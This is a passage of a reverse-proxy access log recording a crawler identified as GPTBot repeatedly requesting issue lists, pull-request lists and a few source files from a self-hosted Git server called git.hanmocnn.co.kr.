+[17/Feb/2026:19:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=rendered" [Client 74.7.227.38] [Length 12113] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:19:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=source" [Client 74.7.227.38] [Length 11148] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:19:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md?display=source" [Client 74.7.227.38] [Length 13565] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:19:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:19:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 20122] [Gzip 5.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:19:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt?display=source" [Client 74.7.227.38] [Length 11489] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:19:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 